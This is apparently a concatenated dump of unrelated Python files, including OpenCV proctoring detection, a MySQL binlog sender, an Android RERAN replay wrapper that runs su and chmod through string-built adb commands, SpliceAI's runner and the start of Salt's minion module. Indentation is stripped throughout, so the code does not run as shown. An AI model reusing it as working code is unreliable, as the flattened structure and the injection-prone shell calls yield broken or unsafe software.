cnt_outer += 1
for i, (p1, p2) in enumerate(inner_points):
if d_inner[i] + 3 < shape[p2][1] - shape[p1][1]:
cnt_inner += 1
if cnt_outer > 4 or cnt_inner > 3:
print('Mouth open')
for (x, y) in shape[48:]:
cv2.circle(img, (x, y), 2, (0, 0, 255), -1)
#eyes
            mask = np.zeros((h, w), dtype=np.uint8)
mask, end_points_left = eye_on_mask(mask, left, shape)
mask, end_points_right = eye_on_mask(mask, right, shape)
mask = cv2.dilate(mask, kernel, 5)
eyes = cv2.bitwise_and(img, img, mask=mask)
mask = (eyes == [0, 0, 0]).all(axis=2)
eyes[mask] = [255, 255, 255]
mid = (shape[42][0] + shape[39][0]) // 2
eyes_gray = cv2.cvtColor(eyes, cv2.COLOR_BGR2GRAY)
threshold = cv2.getTrackbarPos('threshold', 'image')
_, thresh = cv2.threshold(eyes_gray, threshold, 255, cv2.THRESH_BINARY)
thresh = process_thresh(thresh)
eyeball_pos_left = contouring(thresh[:, 0:mid], mid, img, end_points_left)
eyeball_pos_right = contouring(thresh[:, mid:], mid, img, end_points_right, True)
print_eye_pos(eyeball_pos_left, eyeball_pos_right)
cv2.imshow('result', img)
cv2.imshow("image", thresh)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
def count_people_and_phones():
while True:
ret, image = cap.read()
frame = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (320, 320))
frame = frame.astype(np.float32)
frame = np.expand_dims(frame, 0)
frame = frame / 255
class_names = [c.strip() for c in open("classes.txt").readlines()]
boxes, scores, classes, nums = yolo(frame)
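        # COCO class ids: 0 is 'person', 67 is 'cell phone'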
count = 0
for i in range(nums[0]):
if int(classes[0][i] == 0):
count += 1
if int(classes[0][i] == 67):
print("Mobile Phone Detected")
if count == 0:
print('No person detected')
elif count > 1:
print('More than one person detected')
image = draw_outputs(image, (boxes, scores, classes, nums), class_names)
cv2.imshow('Prediction', image)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
t1 = threading.Thread(target=eyes_mouth)
t2 = threading.Thread(target=count_people_and_phones)
t1.start()
t2.start()
t1.join()
t2.join()
cap.release()
cv2.destroyAllWindows()
html_content = f"<html> <head> </head> <h1> {t1} </h1> <body> </body> </html>"
with open("index.html", "w") as html_files:
html_files.write(html_content)
print("Html file")
time.sleep(2)
webbrowser.open_new_tab("index.html")
|
senderManager.py
|
# Copyright (c) 2020-present ly.com, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!usr/bin/env python
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import os
import re
import random
import pymysql
import commands
import io
import time
import json
import signal
import ConfigParser
import threading
import Queue
#from DBUtils.PooledDB import PooledDB
from datetime import datetime
import socket
import multiprocessing
from mysqlSender import MysqlSender
from localSender import LocalSender
from kafkaSender import KafkaSender
from sqlConstruct import SqlConstruct
class SenderManager(multiprocessing.Process):
def __init__(self,configPath, queue, ackQueue):
multiprocessing.Process.__init__(self)
self.datasource = queue
self.ackQueue = ackQueue
self.configPath = configPath
self.daemon = True
def init(self):
self.commitTs = 0
print os.getppid()
self.config = ConfigParser.ConfigParser()
self.config.read(self.configPath)
self.updateCheckpointThread = threading.Thread(target=self.updateCheckpointThreadFunc)
self.updateCheckpointThread.setDaemon(True)
self.updateCheckpointThread.start()
self.type_list = self.config.get('global','type').split(',')
self.check_list = []
self.sqlConstruct = SqlConstruct()
self.initSenders()
def isAlive(self):
return self.is_alive()
def initSenders(self):
self.senderList = []
for ty in self.type_list:
if ty == 'mysql':
self.senderList.append(MysqlSender(self.config))
elif ty == 'local':
self.senderList.append(LocalSender(self.config))
elif ty == 'kafka':
self.senderList.append(KafkaSender(self.config))
for sender in self.senderList:
sender.start()
def run(self):
self.init()
beg = time.time()
cnt = 0
while 1:
binlog_list = []
for i in range(1000):
                # Break out of this loop and send the non-empty binlog_list when:
                # 1. the binlog queue is empty  2. a conflict is detected  3. 1000 binlogs have been collected
#if self.datasource.empty():
# break
binlog = self.datasource.get()
cnt += 1
if cnt % 10000 == 0:
print cnt, "%.2f" % (time.time() - beg)
beg = time.time()
                # Conflict detection
hash_flag = ""
hash_flag_old = ""
hash_flag = '_'.join(['%s' % str(binlog['value'][key]) for key in binlog['primary_key']])
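                # hash_flag is a fingerprint of the row's primary key; seeing it twice in one batch means two statements touch the same row, so the batch is flushed first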
if binlog['type'] == 'UPDATE':
hash_flag_old = '_'.join(['%s' % str(binlog['old_value'][key]) for key in binlog['primary_key']])
if self.check_list.count(hash_flag):
self.flushjob()
self.check_list.append(hash_flag)
if binlog['type'] == "UPDATE":
self.check_list.append(hash_flag_old)
hash_flag = hash_flag_old
binlog_list.append(binlog)
                # Reset check_list
if len(self.check_list) >= 1000:
#self.flushjob()
self.check_list = []
if len(binlog_list) != 0:
sql_list = self.sqlConstruct.sqlConstruct(binlog_list)
self.sendSql(sql_list)
def sendSql(self,sql_list):
for i in range(len(sql_list)):
for sender in self.senderList:
sender.send(sql_list[i])
def updateCheckpointThreadFunc(self):
while True:
minTs = 1 << 64
time.sleep(3)
for sender in self.senderList:
minTs = min(minTs, sender.getCheckpoint())
self.commitTs = minTs
self.ackQueue.put(self.commitTs)
print "commitTs",self.commitTs
def flushjob(self):
for sender in self.senderList:
sender.flush()
|
people_perception.py
|
import cv2
import os
import threading
from darcyai import DarcyAI
from flask import Flask, request, Response
VIDEO_DEVICE = os.getenv("VIDEO_DEVICE", "/dev/video0")
def analyze(frame_number, objects):
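    # The early return below disables the per-object debug printing that follows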
return
for object in objects:
if object.body["has_face"]:
print("{}: {}".format(object.object_id, object.body["face_position"]))
else:
print("{}: No face".format(object.object_id))
def draw_object_rectangle_on_frame(frame, object):
box = object.bounding_box
cv2.rectangle(frame, box[0], box[1], (0, 0, 255), 1)
cv2.putText(frame, "{}: {}".format(object.uuid, object.body["face_position"]), (box[0][0] + 2, box[0][1] + 40), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (255, 255, 255), 2)
return frame
def frame_processor(frame_number, frame, detected_objects):
frame_clone = frame.copy()
for object in detected_objects:
frame_clone = draw_object_rectangle_on_frame(frame_clone, object)
return frame_clone
def root():
return flask_app.send_static_file('index.html')
if __name__ == "__main__":
script_dir = os.path.dirname(os.path.realpath(__file__))
flask_app = Flask(__name__, static_url_path=script_dir)
flask_app.add_url_rule("/", "root", root)
ai = DarcyAI(
data_processor=analyze,
frame_processor=frame_processor,
flask_app=flask_app,
arch="armv7l",
use_pi_camera=False,
video_device=VIDEO_DEVICE)
threading.Thread(target=ai.Start).start()
flask_app.run(
host="0.0.0.0",
port=3456,
debug=False)
|
orderpoint_procurement.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
#
# Order Point Method:
# - Order if the virtual stock of today is below the min of the defined order point
#
import threading
from openerp import pooler
from openerp.osv import fields,osv
class procurement_compute(osv.osv_memory):
_name = 'procurement.orderpoint.compute'
_description = 'Automatic Order Point'
_columns = {
'automatic': fields.boolean('Automatic Orderpoint', help='If the stock of a product is under 0, it will act like an orderpoint'),
}
_defaults = {
'automatic': False,
}
def _procure_calculation_orderpoint(self, cr, uid, ids, context=None):
"""
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
"""
proc_obj = self.pool.get('procurement.order')
#As this function is in a new thread, I need to open a new cursor, because the old one may be closed
new_cr = pooler.get_db(cr.dbname).cursor()
for proc in self.browse(new_cr, uid, ids, context=context):
proc_obj._procure_orderpoint_confirm(new_cr, uid, automatic=proc.automatic, use_new_cursor=new_cr.dbname, context=context)
#close the new cursor
new_cr.close()
return {}
def procure_calculation(self, cr, uid, ids, context=None):
"""
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
"""
threaded_calculation = threading.Thread(target=self._procure_calculation_orderpoint, args=(cr, uid, ids, context))
threaded_calculation.start()
return {'type': 'ir.actions.act_window_close'}
procurement_compute()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
test.py
|
from time import sleep
import cv2
from threading import Thread
class App1:
def __init__(self, src=0):
self.stopped = False
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.thread = Thread(target=self.update, args=())
        # self.thread.daemon = True # shutdown when program quits
self.thread.start()
# def start(self):
# self.thread.start()
# def start(self):
# # start the thread to read frames from the video stream
# # Thread(target=self.update, args=()) \
# self.thread.start()
# return self
def update(self):
# display(self.pb)
# for i in range(200):
while True:
# print(':', end=' ' )
# print("here")
sleep(0.001)
if self.stopped:
break
# (self.grabbed, self.frame) = self.stream.read()
# print("here")
print("thread finished")
def stop(self):
"""indicate that the thread should be stopped"""
self.stopped = True
# wait until stream resources are released (producer thread might be still grabbing frame)
self.thread.join()
# app = App1().start()
app = App1()
|
RERANWrapper.py
|
import os
import sys
import argparse
from subprocess import call, check_output, Popen, PIPE
from multiprocessing import Process
import os.path as path
default_tests_path="./tests/"
translate_jar_path="./build/RERANTranslate.jar"
replay_bin_path="./build/replay"
def record_events(filename):
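    # 'adb shell getevent -t' streams timestamped input events to the file; it keeps running until this process is terminated by the caller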
cmd = "adb shell getevent -t > " + filename
pipes = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
std_out, std_err = pipes.communicate()
pipes.wait()
class RERANWrapper(object):
"""docstring for RERANWrapper"""
def __init__(self, tests_folder, jar_path, translator_jar_path, replay_bin_path):
self.jar_path = jar_path
self.translator_jar_path = translator_jar_path
self.replay_bin_path = replay_bin_path
self.tests_folder = tests_folder
def pushToDevice(self, in_name):
filename=path.basename(in_name)
os.system("adb push " + in_name + " /sdcard/" + filename)
os.system("adb push " + self.replay_bin_path + " /sdcard/")
os.system("adb shell su -c \" cp /sdcard/" +filename+ " /data/local/ \"" )
os.system("adb shell su -c \" cp /sdcard/replay" + " /data/local/ \"" )
os.system("adb shell su -c \" chmod 777 /data/local/replay\"")
def replay(self, app_id,in_name):
filename=path.basename(in_name)
# run replay program with 0 delay time
os.system("adb shell su -c \" /data/local/./replay /data/local/" + filename+ " 0\"" )
def translate_events(self, fileDir, filename):
new_file="translated_" + filename
os.system("java -jar "+ self.translator_jar_path + " " + fileDir + "/"+filename + " "+ fileDir + "/" + new_file)
return os.path.join(fileDir ,new_file)
def record(self, app_id,out_name):
        #check if a directory exists for this app
dirname= os.path.join(self.tests_folder, app_id)
if not os.path.isdir(dirname):
os.mkdir(dirname)
        # create a killable process that runs record_events, since there isn't an easy way to kill threads in Python
p=Process(target=record_events, args=(str(os.path.join(dirname, out_name)),))
p.start()
val = raw_input("press any key to stop recording")
p.terminate()
new_file = self.translate_events(str(dirname), out_name)
print( "translated events to " + new_file)
return new_file
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-r", "--replaypath", default=replay_bin_path, type=str)
parser.add_argument("-tf", "--testfolder", default=default_tests_path, type=str)
parser.add_argument("-jar", "--jarpath", default=translate_jar_path, type=str)
parser.add_argument("-t", "--task", default="all", type=str)
parser.add_argument("-o", "--outputfile", default="reran.out", type=str)
parser.add_argument("-a", "--appid", default="unknown_app", type=str)
args = parser.parse_args()
task_name = args.task
reran = RERANWrapper(args.testfolder, args.jarpath, args.jarpath, args.replaypath)
if task_name == "record":
reran.record(args.appid,args.outputfile)
elif task_name == "replay":
reran.replay(args.appid,args.outputfile)
elif task_name == "push":
reran.pushToDevice( args.outputfile)
elif task_name == "all":
new_file = reran.record(args.appid,args.outputfile)
reran.pushToDevice(new_file)
reran.replay(args.appid,new_file)
|
__main__.py
|
import queue
import argparse
import logging
from multiprocessing import Queue, Process, cpu_count
from itertools import count
import pysam
from spliceai.utils import Annotator, get_delta_scores
from collections import namedtuple
try:
from sys.stdin import buffer as std_in
from sys.stdout import buffer as std_out
except ImportError:
from sys import stdin as std_in
from sys import stdout as std_out
def get_options():
parser = argparse.ArgumentParser(description='Version: 1.3')
parser.add_argument('-I', metavar='input', nargs='?', default=std_in,
help='path to the input VCF file, defaults to standard in')
parser.add_argument('-O', metavar='output', nargs='?', default=std_out,
help='path to the output VCF file, defaults to standard out')
parser.add_argument('-R', metavar='reference', required=True,
help='path to the reference genome fasta file')
parser.add_argument('-A', metavar='annotation', required=True,
help='"grch37" (GENCODE V24lift37 canonical annotation file in '
'package), "grch38" (GENCODE V24 canonical annotation file in '
'package), or path to a similar custom gene annotation file')
parser.add_argument('-D', metavar='distance', nargs='?', default=50,
type=int, choices=range(0, 5000),
help='maximum distance between the variant and gained/lost splice '
'site, defaults to 50')
parser.add_argument('-M', metavar='mask', nargs='?', default=0,
type=int, choices=[0, 1],
help='mask scores representing annotated acceptor/donor gain and '
'unannotated acceptor/donor loss, defaults to 0')
parser.add_argument('-P', metavar='processes', default=1, type=int)
args = parser.parse_args()
return args
def run_serial(args):
"""
串行运行
"""
try:
vcf = pysam.VariantFile(args.I)
except (IOError, ValueError) as e:
logging.error('{}'.format(e))
exit()
header = vcf.header
header.add_line('##INFO=<ID=SpliceAI,Number=.,Type=String,Description="SpliceAIv1.3 variant '
'annotation. These include delta scores (DS) and delta positions (DP) for '
'acceptor gain (AG), acceptor loss (AL), donor gain (DG), and donor loss (DL). '
'Format: ALLELE|SYMBOL|DS_AG|DS_AL|DS_DG|DS_DL|DP_AG|DP_AL|DP_DG|DP_DL">')
try:
output = pysam.VariantFile(args.O, mode='w', header=header)
except (IOError, ValueError) as e:
logging.error('{}'.format(e))
exit()
ann = Annotator(args.R, args.A)
for record in vcf:
scores = get_delta_scores(record, ann, args.D, args.M)
if len(scores) > 0:
record.info['SpliceAI'] = scores
output.write(record)
vcf.close()
output.close()
ParallelVariantRecord = namedtuple('ParallelVariantRecord', ['id', 'chrom', 'pos', 'ref', 'alts'])
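# Lightweight stand-in for pysam's VariantRecord, which cannot be pickled and shared across worker processes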
def process_record(records, results, ref_fasta, annotations, dist_var, mask):
    # Create an annotation helper
ann = Annotator(ref_fasta, annotations)
    # Listen on the work queue
while True:
        # Try to get a variant to score from the queue
try:
record = records.get_nowait()
except queue.Empty:
continue
        # Check whether the queue has been exhausted
if record != 'END':
            # Score the variant and put the result on the results queue
scores = get_delta_scores(record, ann, dist_var, mask)
results.put((record.id, scores))
else:
            # Queue finished: put the end marker back so the other worker processes also stop
records.put('END')
break
def run_parallel(args):
"""
并行运行
"""
# 尝试打开文件
try:
vcf = pysam.VariantFile(args.I)
except (IOError, ValueError) as e:
logging.error('{}'.format(e))
exit()
header = vcf.header
header.add_line('##INFO=<ID=SpliceAI,Number=.,Type=String,Description="SpliceAIv1.3 variant '
'annotation. These include delta scores (DS) and delta positions (DP) for '
'acceptor gain (AG), acceptor loss (AL), donor gain (DG), and donor loss (DL). '
'Format: ALLELE|SYMBOL|DS_AG|DS_AL|DS_DG|DS_DL|DP_AG|DP_AL|DP_DG|DP_DL">')
try:
output = pysam.VariantFile(args.O, mode='w', header=header)
except (IOError, ValueError) as e:
logging.error('{}'.format(e))
exit()
    # Compute the number of usable cores
processes_num = min(cpu_count(), args.P)
    # Create the queues; the work queue holds 10x the number of processes, large enough to keep workers busy without hogging memory or blocking the reader
records, results = Queue(10 * processes_num), Queue()
    # Track variants that have been queued and are waiting for their results
waiting_records = dict()
    # Generate record IDs
record_ids = count()
    # Run-state flags
input_finished = False
output_finished = False
    # Start worker processes that listen on the queue
for i in range(processes_num):
Process(target=process_record, args=(records, results, args.R, args.A, args.D, args.M)).start()
while True:
        # Feed variants into the work queue
while not input_finished and not records.full():
try:
                # Get the next variant
record_id, record = next(record_ids), next(vcf)
                # Put the variant on the queue
                # pysam's VariantRecord objects cannot be shared across processes, so a lightweight stand-in is used instead
records.put(ParallelVariantRecord(record_id, record.chrom, record.pos, record.ref, record.alts))
waiting_records[record_id] = record
except StopIteration:
                # Input exhausted: record that and put the end marker on the queue
input_finished = True
records.put('END')
break
        # Process the results that have come back
while waiting_records:
            # Try to fetch a result from the queue
try:
result = results.get_nowait()
except queue.Empty:
break
            # Match the score back to its waiting variant
record = waiting_records.pop(result[0])
            # Write out the scored variant
if len(result[1]) > 0:
record.info['SpliceAI'] = result[1]
output.write(record)
else:
            # Mark output as finished
output_finished = True
        # Everything has been processed
if output_finished:
break
vcf.close()
output.close()
def main():
args = get_options()
if None in [args.I, args.O, args.D, args.M]:
logging.error('Usage: spliceai [-h] [-I [input]] [-O [output]] -R reference -A annotation '
'[-D [distance]] [-M [mask]]')
exit()
    # Choose serial or parallel mode based on the requested number of processes
run_serial(args) if args.P == 1 else run_parallel(args)
if __name__ == '__main__':
main()
|
v2_Process_algoritimo_aprendizagem_02.py
|
import numpy as np
import datetime
from concurrent.futures.process import ProcessPoolExecutor as Process
from threading import Thread
inicio = datetime.datetime.now()
def sigmoid(soma):
return 1 / (1 + np.exp(-soma))
def sigmoidDerivada(sig):
return sig * (1 - sig)
def processar(epocas, entradas,saidas,taxaAprendizagem,momento,pesos0, pesos1):
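    # Trains a 2-3-1 network on the XOR table below using sigmoid activations and plain backpropagation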
for j in range(epocas):
camadaEntrada = entradas
somaSinapse0 = np.dot(camadaEntrada, pesos0)
camadaOculta = sigmoid(somaSinapse0)
somaSinapse1 = np.dot(camadaOculta, pesos1)
camadaSaida = sigmoid(somaSinapse1)
erroCamadaSaida = saidas - camadaSaida
mediaAbsoluta = np.mean(np.abs(erroCamadaSaida))
print(f"Epocas {j}.... Erro: {str(mediaAbsoluta)}")
derivadaSaida = sigmoidDerivada(camadaSaida)
deltaSaida = erroCamadaSaida * derivadaSaida
pesos1Transposta = pesos1.T
deltaSaidaXPeso = deltaSaida.dot(pesos1Transposta)
deltaCamadaOculta = deltaSaidaXPeso * sigmoidDerivada(camadaOculta)
camadaOcultaTransposta = camadaOculta.T
pesosNovo1 = camadaOcultaTransposta.dot(deltaSaida)
pesos1 = (pesos1 * momento) + (pesosNovo1 * taxaAprendizagem)
camadaEntradaTransposta = camadaEntrada.T
pesosNovo0 = camadaEntradaTransposta.dot(deltaCamadaOculta)
pesos0 = (pesos0 * momento) + (pesosNovo0 * taxaAprendizagem)
entradas = np.array([[0,0],
[0,1],
[1,0],
[1,1]])
saidas = np.array([[0],[1],[1],[0]])
pesos0 = 2*np.random.random((2,3)) - 1
pesos1 = 2*np.random.random((3,1)) - 1
epocas = 10000
taxaAprendizagem = 0.5
momento = 1
if __name__ == '__main__':
with Process() as chamada:
futuro = chamada.submit(processar, epocas, entradas,saidas,taxaAprendizagem,momento,pesos0, pesos1)
        futuro.result()  # a Future is not callable and cannot be a Thread target; wait on the result directly
tempo_atual = datetime.datetime.now() - inicio
print(f'Tempo de duração foi de {tempo_atual.total_seconds():.5f} segundos')
|
utils_test.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
# Disable 'Access to a protected member ...'. NDB uses '_' for other purposes.
# pylint: disable=W0212
import datetime
import sys
import threading
import unittest
from test_support import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components import utils
from test_support import test_case
class Rambling(ndb.Model):
"""Fake statistics."""
a = ndb.IntegerProperty()
b = ndb.FloatProperty()
c = ndb.DateTimeProperty()
d = ndb.DateProperty()
def to_dict(self):
out = super(Rambling, self).to_dict()
out['e'] = datetime.timedelta(seconds=1.1)
out['f'] = '\xc4\xa9'
return out
class UtilsTest(test_case.TestCase):
def test_json(self):
r = Rambling(
a=2,
b=0.2,
c=datetime.datetime(2012, 1, 2, 3, 4, 5, 6),
d=datetime.date(2012, 1, 2))
actual = utils.to_json_encodable([r])
# Confirm that default is tight encoding and sorted keys.
expected = [
{
'a': 2,
'b': 0.2,
'c': u'2012-01-02 03:04:05',
'd': u'2012-01-02',
'e': 1,
'f': u'\u0129',
},
]
self.assertEqual(expected, actual)
self.assertEqual([0, 1], utils.to_json_encodable(range(2)))
self.assertEqual([0, 1], utils.to_json_encodable(i for i in (0, 1)))
self.assertEqual([0, 1], utils.to_json_encodable(xrange(2)))
def test_validate_root_service_url_dev_server(self):
self.mock(utils, 'is_local_dev_server', lambda: True)
utils.validate_root_service_url('https://blah')
utils.validate_root_service_url('http://localhost:8080')
def test_validate_root_service_url_gae(self):
self.mock(utils, 'is_local_dev_server', lambda: False)
utils.validate_root_service_url('https://blah')
with self.assertRaises(ValueError):
utils.validate_root_service_url('http://localhost:8080')
def test_validate_root_service_bad(self):
with self.assertRaises(ValueError):
utils.validate_root_service_url('')
with self.assertRaises(ValueError):
utils.validate_root_service_url('blah://blah')
with self.assertRaises(ValueError):
utils.validate_root_service_url('https://')
with self.assertRaises(ValueError):
utils.validate_root_service_url('https://blah/')
with self.assertRaises(ValueError):
utils.validate_root_service_url('https://blah?asdad')
def test_datetime_to_rfc2822(self):
self.assertEqual(
'Mon, 02 Jan 2012 03:04:05 -0000',
utils.datetime_to_rfc2822(datetime.datetime(2012, 1, 2, 3, 4, 5)))
def test_milliseconds_since_epoch(self):
self.mock_now(datetime.datetime(1970, 1, 2, 3, 4, 5, 6789))
delta = utils.milliseconds_since_epoch(None)
self.assertEqual(97445007, delta)
def test_cache(self):
calls = []
@utils.cache
def get_me():
calls.append(1)
return len(calls)
self.assertEqual(1, get_me())
self.assertEqual(1, get_me())
self.assertEqual(1, len(calls))
def test_cache_with_tasklets(self):
@utils.cache
def f():
ndb.sleep(0).wait() # Yield thread.
return 1
@ndb.tasklet
def g():
yield () # Make g a generator.
raise ndb.Return(f())
def test():
ndb.Future.wait_all([(g()), (g())])
t = threading.Thread(target=test)
t.daemon = True
t.start()
t.join(1)
if t.is_alive():
self.fail('deadlock')
def test_clear_cache(self):
calls = []
@utils.cache
def get_me():
calls.append(1)
return len(calls)
self.assertEqual(1, get_me())
utils.clear_cache(get_me)
self.assertEqual(2, get_me())
self.assertEqual(2, len(calls))
class FakeNdbContext(object):
def __init__(self):
self.get_calls = []
self.set_calls = []
self.cached_value = None
@ndb.tasklet
def memcache_get(self, key):
self.get_calls.append(key)
raise ndb.Return(self.cached_value)
# pylint: disable=redefined-outer-name
@ndb.tasklet
def memcache_set(self, key, value, time=None):
self.cached_value = value
self.set_calls.append((key, value, time))
class MemcacheTest(test_case.TestCase):
def setUp(self):
super(MemcacheTest, self).setUp()
self.f_calls = []
self.f_value = 'value'
self.ctx = FakeNdbContext()
self.mock(ndb, 'get_context', lambda: self.ctx)
@utils.memcache('f', ['a', 'b', 'c', 'd'], time=54)
def f(self, a, b, c=3, d=4, e=5):
self.f_calls.append((a, b, c, d, e))
return self.f_value
@utils.memcache_async('f', ['a', 'b', 'c', 'd'], time=54)
@ndb.tasklet
def f_async(self, a, b, c=3, d=4, e=5):
self.f_calls.append((a, b, c, d, e))
raise ndb.Return(self.f_value)
def test_async(self):
self.f_async(1, 2, 3, 4, 5).get_result()
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', ('value',), 54)])
def test_call(self):
self.f(1, 2, 3, 4, 5)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', ('value',), 54)])
self.ctx.get_calls = []
self.f_calls = []
self.ctx.set_calls = []
self.f(1, 2, 3, 4)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [])
self.assertEqual(self.ctx.set_calls, [])
def test_none(self):
self.f_value = None
self.assertEqual(self.f(1, 2, 3, 4), None)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', (None,), 54)])
self.ctx.get_calls = []
self.f_calls = []
self.ctx.set_calls = []
self.assertEqual(self.f(1, 2, 3, 4), None)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [])
self.assertEqual(self.ctx.set_calls, [])
def test_call_without_optional_arg(self):
self.f(1, 2)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', ('value',), 54)])
def test_call_kwargs(self):
self.f(1, 2, c=30, d=40)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 30, 40]'])
self.assertEqual(self.f_calls, [(1, 2, 30, 40, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 30, 40]', ('value',), 54)])
def test_call_all_kwargs(self):
self.f(a=1, b=2, c=30, d=40)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 30, 40]'])
self.assertEqual(self.f_calls, [(1, 2, 30, 40, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 30, 40]', ('value',), 54)])
def test_call_packed_args(self):
self.f(*[1, 2])
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 3, 4]'])
self.assertEqual(self.f_calls, [(1, 2, 3, 4, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 3, 4]', ('value',), 54)])
def test_call_packed_kwargs(self):
self.f(1, 2, **{'c':30, 'd': 40})
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 30, 40]'])
self.assertEqual(self.f_calls, [(1, 2, 30, 40, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 30, 40]', ('value',), 54)])
def test_call_packed_both(self):
self.f(*[1, 2], **{'c':30, 'd': 40})
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[1, 2, 30, 40]'])
self.assertEqual(self.f_calls, [(1, 2, 30, 40, 5)])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[1, 2, 30, 40]', ('value',), 54)])
def test_empty_key_arg(self):
@utils.memcache('f')
def f(a):
# pylint: disable=unused-argument
return 1
f(1)
self.assertEqual(self.ctx.get_calls, ['utils.memcache/v1a/f[]'])
self.assertEqual(
self.ctx.set_calls,
[('utils.memcache/v1a/f[]', (1,), None)])
def test_nonexisting_arg(self):
with self.assertRaises(KeyError):
# pylint: disable=unused-variable
@utils.memcache('f', ['b'])
def f(a):
# pylint: disable=unused-argument
pass
def test_invalid_args(self):
with self.assertRaises(TypeError):
# pylint: disable=no-value-for-parameter
self.f()
with self.assertRaises(TypeError):
# pylint: disable=no-value-for-parameter
self.f(b=3)
with self.assertRaises(TypeError):
# pylint: disable=unexpected-keyword-arg
self.f(1, 2, x=3)
def test_args_prohibited(self):
with self.assertRaises(NotImplementedError):
# pylint: disable=unused-variable
@utils.memcache('f', [])
def f(a, *args):
# pylint: disable=unused-argument
pass
def test_kwargs_prohibited(self):
with self.assertRaises(NotImplementedError):
# pylint: disable=unused-variable
@utils.memcache('f', [])
def f(**kwargs):
# pylint: disable=unused-argument
pass
if __name__ == '__main__':
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
